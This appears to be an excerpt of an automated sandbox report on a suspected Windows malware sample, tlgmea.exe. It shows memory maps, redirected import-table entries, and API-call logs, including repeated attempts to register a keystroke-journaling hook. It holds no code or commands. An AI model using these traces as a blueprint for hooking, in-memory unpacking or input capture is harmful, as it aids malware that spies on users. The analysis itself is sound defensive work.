private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00174fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
crypt32.dll.mui 0x00180000 0x00189fff Memory Mapped File Readable False False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001b1fff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True False False -
locale.nls 0x001f0000 0x002adfff Memory Mapped File Readable False False False -
private_0x00000000002b0000 0x002b0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable, Executable True False False -
tlgmea.exe 0x00400000 0x04b6dfff Memory Mapped File Readable, Writable, Executable True True False
...
private_0x0000000004b70000 0x04b70000 0x04b8afff Private Memory Readable, Writable, Executable True False False -
private_0x0000000004b90000 0x04b90000 0x04bb6fff Private Memory Readable, Writable True False False -
private_0x0000000004b90000 0x04b90000 0x04ba6fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000004bb0000 0x04bb0000 0x04beffff Private Memory Readable, Writable True False False -
private_0x0000000004bf0000 0x04bf0000 0x04bf0fff Private Memory Readable, Writable True False False -
private_0x0000000004c00000 0x04c00000 0x04c0ffff Private Memory Readable, Writable True False False -
private_0x0000000004c10000 0x04c10000 0x04c10fff Private Memory Readable, Writable True False False -
private_0x0000000004c20000 0x04c20000 0x04c20fff Private Memory Readable, Writable True False False -
private_0x0000000004c30000 0x04c30000 0x04c30fff Private Memory Readable, Writable True False False -
private_0x0000000004c40000 0x04c40000 0x04c40fff Private Memory Readable, Writable True False False -
private_0x0000000004c50000 0x04c50000 0x04c50fff Private Memory Readable, Writable True False False -
private_0x0000000004c60000 0x04c60000 0x04c60fff Private Memory Readable, Writable True False False -
private_0x0000000004c70000 0x04c70000 0x04c70fff Private Memory Readable, Writable True False False -
private_0x0000000004c80000 0x04c80000 0x04c80fff Private Memory Readable, Writable True False False -
private_0x0000000004c90000 0x04c90000 0x04c9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004c90000 0x04c90000 0x04c94fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004c90000 0x04c90000 0x04c90fff Private Memory Readable, Writable True False False -
pagefile_0x0000000004ca0000 0x04ca0000 0x04ca4fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000004ca0000 0x04ca0000 0x04ca0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004cb0000 0x04cb0000 0x04daffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004db0000 0x04db0000 0x04f37fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004f40000 0x04f40000 0x050c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000050d0000 0x050d0000 0x064cffff Pagefile Backed Memory Readable True False False -
private_0x00000000064d0000 0x064d0000 0x066affff Private Memory Readable, Writable True False False -
private_0x00000000064d0000 0x064d0000 0x0660ffff Private Memory Readable, Writable True False False -
private_0x00000000064d0000 0x064d0000 0x065cffff Private Memory Readable, Writable True False False -
counters.dat 0x065d0000 0x065d0fff Memory Mapped File Readable, Writable True True False
...
private_0x00000000065e0000 0x065e0000 0x065e2fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000065e0000 0x065e0000 0x065f7fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000065f0000 0x065f0000 0x065f2fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000006600000 0x06600000 0x0660ffff Private Memory Readable, Writable True False False -
private_0x0000000006610000 0x06610000 0x0664ffff Private Memory Readable, Writable True False False -
private_0x0000000006650000 0x06650000 0x0668ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000006690000 0x06690000 0x06690fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000066a0000 0x066a0000 0x066affff Private Memory Readable, Writable True False False -
sortdefault.nls 0x066b0000 0x069e6fff Memory Mapped File Readable False False False -
ole32.dll 0x069f0000 0x06ad8fff Memory Mapped File Readable False False False -
private_0x00000000069f0000 0x069f0000 0x06aeffff Private Memory Readable, Writable True False False -
private_0x0000000006af0000 0x06af0000 0x06beffff Private Memory Readable, Writable True False False -
private_0x0000000006bf0000 0x06bf0000 0x06c2ffff Private Memory Readable, Writable True False False -
private_0x0000000006c30000 0x06c30000 0x06d2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000006d30000 0x06d30000 0x06d31fff Pagefile Backed Memory Readable True False False -
mswsock.dll.mui 0x06d40000 0x06d42fff Memory Mapped File Readable False False False -
pagefile_0x0000000006d50000 0x06d50000 0x06d51fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000006d60000 0x06d60000 0x06d6ffff Pagefile Backed Memory Readable True False False -
private_0x0000000006d70000 0x06d70000 0x06d70fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000006d80000 0x06d80000 0x06d80fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000006d80000 0x06d80000 0x06d88fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000006d90000 0x06d90000 0x06ddffff Private Memory Readable, Writable True False False -
private_0x0000000006d90000 0x06d90000 0x06d90fff Private Memory Readable, Writable True False False -
private_0x0000000006da0000 0x06da0000 0x06da0fff Private Memory Readable, Writable True False False -
private_0x0000000006da0000 0x06da0000 0x06da1fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000006db0000 0x06db0000 0x06db0fff Private Memory Readable, Writable True False False -
private_0x0000000006dc0000 0x06dc0000 0x06dc0fff Private Memory Readable, Writable True False False -
private_0x0000000006dc0000 0x06dc0000 0x06dc3fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000006dd0000 0x06dd0000 0x06dd2fff Private Memory Readable, Writable True False False -
private_0x0000000006de0000 0x06de0000 0x06de0fff Private Memory Readable, Writable True False False -
private_0x0000000006df0000 0x06df0000 0x06df0fff Private Memory Readable, Writable True False False -
private_0x0000000006e00000 0x06e00000 0x06e00fff Private Memory Readable, Writable True False False -
wow64cpu.dll 0x54680000 0x54687fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54690000 0x546defff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x546e0000 0x54752fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73430000 0x73475fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73480000 0x73487fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73490000 0x73513fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73520000 0x7356dfff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x73570000 0x73616fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73620000 0x73627fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73630000 0x7365ffff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x73660000 0x73670fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x73680000 0x73698fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x736a0000 0x738c3fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x738d0000 0x7398efff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x73990000 0x73a20fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x73a30000 0x73cf0fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x73d00000 0x73e5ffff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x73e60000 0x73e8efff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73e90000 0x73eaafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x73eb0000 0x73ec2fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x740a0000 0x742a8fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x742b0000 0x74308fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74310000 0x74319fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74320000 0x7433dfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74340000 0x743fdfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x74460000 0x744a3fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x744b0000 0x74669fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x74670000 0x74b4cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x74b50000 0x74bcafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x74bd0000 0x74c61fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x74e20000 0x74e63fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x74f00000 0x74f5bfff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74f80000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74fb0000 0x7509ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x750a0000 0x75215fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75220000 0x75262fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75310000 0x75315fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75320000 0x7543ffff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x75440000 0x7544efff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x754d0000 0x7560ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75610000 0x75616fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75620000 0x7576cfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x75970000 0x75a1bfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x75b90000 0x75b9bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75ba0000 0x76f5efff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x76f60000 0x76fecfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76ff0000 0x77164fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77210000 0x77388fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007feaa000 0x7feaa000 0x7feacfff Private Memory Readable, Writable True False False -
private_0x000000007fead000 0x7fead000 0x7feaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory Readable, Writable True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory Readable, Writable True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory Readable, Writable True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff9eec1ffff Private Memory Readable True False False -
ntdll.dll 0x7ff9eec20000 0x7ff9eede1fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9eede2000 0x7ff9eede2000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 14 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000004b70000:+0xbec 5. entry of tlgmea.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to tlgmea.exe:+0x1cf77b0
...
IAT private_0x0000000004b70000:+0xbec 6. entry of tlgmea.exe 4 bytes kernel32.dll:PrepareTape+0x0 now points to private_0x000000007fff0000:+0x4ec3a201
...
IAT private_0x0000000004b70000:+0xbec 7. entry of tlgmea.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0xb328d
...
IAT private_0x0000000004b70000:+0xbec 8. entry of tlgmea.exe 4 bytes kernel32.dll:FindFirstVolumeMountPointW+0x0 now points to private_0x000000007fff0000:+0x7ccc66d2
...
IAT private_0x0000000004b70000:+0xbec 9. entry of tlgmea.exe 4 bytes kernel32.dll:AddConsoleAliasA+0x0 now points to private_0x000000007fff0000:+0x520e0060
...
IAT private_0x0000000004b70000:+0xbec 10. entry of tlgmea.exe 4 bytes kernel32.dll:GetThreadTimes+0x0 now points to private_0x000000007fff0000:+0x6c2f1aec
...
IAT private_0x0000000004b70000:+0xbec 11. entry of tlgmea.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to private_0x000000007fff0000:+0x3a020270
...
IAT private_0x0000000004b70000:+0xbec 12. entry of tlgmea.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x5593f6f4
...
IAT private_0x0000000004b70000:+0xbec 15. entry of tlgmea.exe 4 bytes kernel32.dll:SetStdHandle+0x0 now points to private_0x000000007fff0000:+0x1e15684
...
IAT private_0x0000000004b70000:+0xbec 18. entry of tlgmea.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x70fe8d13
...
IAT private_0x0000000004b70000:+0xbec 21. entry of tlgmea.exe 4 bytes kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x190c0a14
...
IAT private_0x0000000004b70000:+0xbec 22. entry of tlgmea.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x3dc307d5
...
IAT private_0x0000000004b70000:+0xbec 23. entry of tlgmea.exe 4 bytes kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x40b10d25
...
IAT private_0x0000000004b70000:+0xbec 24. entry of tlgmea.exe 4 bytes kernel32.dll:InterlockedExchange+0x0 now points to private_0x000000007fff0000:+0x4e040a36
...
IAT private_0x0000000004b70000:+0xbec 25. entry of tlgmea.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x7c0711fa
...
IAT private_0x0000000004b70000:+0xbec 26. entry of tlgmea.exe 4 bytes ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0x13151372
...
IAT private_0x0000000004b70000:+0xbec 27. entry of tlgmea.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to private_0x000000007fff0000:+0x3401eafc
...
IAT private_0x0000000004b70000:+0xbec 28. entry of tlgmea.exe 4 bytes kernel32.dll:Sleep+0x0 now points to private_0x000000007fff0000:+0x47b62cc2
...
IAT private_0x0000000004b70000:+0xbec 30. entry of tlgmea.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x754884db
...
IAT private_0x0000000004b70000:+0xbec 32. entry of tlgmea.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x5b01caa2
...
IAT private_0x0000000004b70000:+0xbec 33. entry of tlgmea.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x5c57545e
...
IAT private_0x0000000004b70000:+0xbec 34. entry of tlgmea.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to tlgmea.exe:+0x1acf176
...
IAT private_0x0000000004b70000:+0xbec 37. entry of tlgmea.exe 4 bytes kernel32.dll:GetStartupInfoW+0x0 now points to private_0x000000007fff0000:+0x81ce036
...
IAT private_0x0000000004b70000:+0xbec 38. entry of tlgmea.exe 4 bytes kernel32.dll:GetCPInfo+0x0 now points to private_0x000000007fff0000:+0x7df1ec53
...
IAT private_0x0000000004b70000:+0xbec 40. entry of tlgmea.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x906ec28
...
IAT private_0x0000000004b70000:+0xbec 41. entry of tlgmea.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7efef02c
...
IAT private_0x0000000004b70000:+0xbec 42. entry of tlgmea.exe 4 bytes kernel32.dll:LCMapStringW+0x0 now points to private_0x000000007fff0000:+0x18575d7c
...
IAT private_0x0000000004b70000:+0xbec 43. entry of tlgmea.exe 4 bytes kernel32.dll:UnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x5fc957f1
...
IAT private_0x0000000004b70000:+0xbec 44. entry of tlgmea.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6fcecec3
...
IAT private_0x0000000004b70000:+0xbec 45. entry of tlgmea.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x18008656
...
IAT private_0x0000000004b70000:+0xbec 46. entry of tlgmea.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x6393f3ee
...
IAT private_0x0000000004b70000:+0xbec 47. entry of tlgmea.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to tlgmea.exe:+0x2e30a26
...
IAT private_0x0000000004b70000:+0xbec 54. entry of tlgmea.exe 4 bytes kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x6c8f4630
...
IAT private_0x0000000004b70000:+0xbec 56. entry of tlgmea.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b450d03
...
IAT private_0x0000000004b70000:+0xbec 58. entry of tlgmea.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0xafc8a12
...
IAT private_0x0000000004b70000:+0xbec 59. entry of tlgmea.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0xf553751
...
IAT private_0x0000000004b70000:+0xbec 60. entry of tlgmea.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x3d8c1cd0
...
IAT private_0x0000000004b70000:+0xbec 61. entry of tlgmea.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x6042305
...
IAT private_0x0000000004b70000:+0xbec 66. entry of tlgmea.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x28d8fd1b
...
IAT private_0x0000000004b70000:+0xbec 69. entry of tlgmea.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x7c753526
...
IAT private_0x0000000004b70000:+0xbec 72. entry of tlgmea.exe 4 bytes kernel32.dll:GetLocaleInfoW+0x0 now points to tlgmea.exe:+0x283a625
...
IAT private_0x0000000004b70000:+0xbec 74. entry of tlgmea.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7e525f13
...
IAT private_0x0000000004b70000:+0xbec 78. entry of tlgmea.exe 4 bytes kernel32.dll:GetLocaleInfoA+0x0 now points to private_0x000000007fff0000:+0x24a018fc
...
IAT private_0x0000000004b70000:+0xbec 80. entry of tlgmea.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0x7c326b52
...
Threads
Thread 0x8ec
347 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74fca330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74fc7580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74fc9910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74fcf400 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74fb0000 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, size = 260 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x74fb0000 True 1
Fn
System Register Hook type = WH_JOURNALRECORD, hookproc_address = 0x0 False 249
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74fcd8d0 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x74fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74fc8b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74fc8c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74fc8c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x74fc9fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74fcfbc0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74fc2da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74fd6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74fc92b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74fc77b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74fc9560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74fd6180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77272570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74fc2db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74fc7940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74fd74f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74fc9640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74fd5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74fc1d90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x74fca2a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74fcd8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74fc2d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74fcfcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74fc9700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x74fd6920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74fd6540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74fc8c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x74fc96e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x74ff26a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x74fd6870 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x74fd6860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x74fd62a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x74fca3c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74fc2af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x74fc1b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x7726f190 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x7726a200 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x74fc9fa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74fc2d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x74fc75a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74fc7910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x74fca060 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x74fd6390 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77269920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x74fca080 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x74fca040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74fd6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x74fc2dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x74fc2b90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x74fca3b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x74fca0f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x74fca790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74fc9680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x74ff28e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x74fca2c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x74fd6020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74fcfbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x74fc9a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x74fc1ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x74fc1da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x74fc9930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74fc9660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77255e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77255e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74fc25e0 True 1
Fn
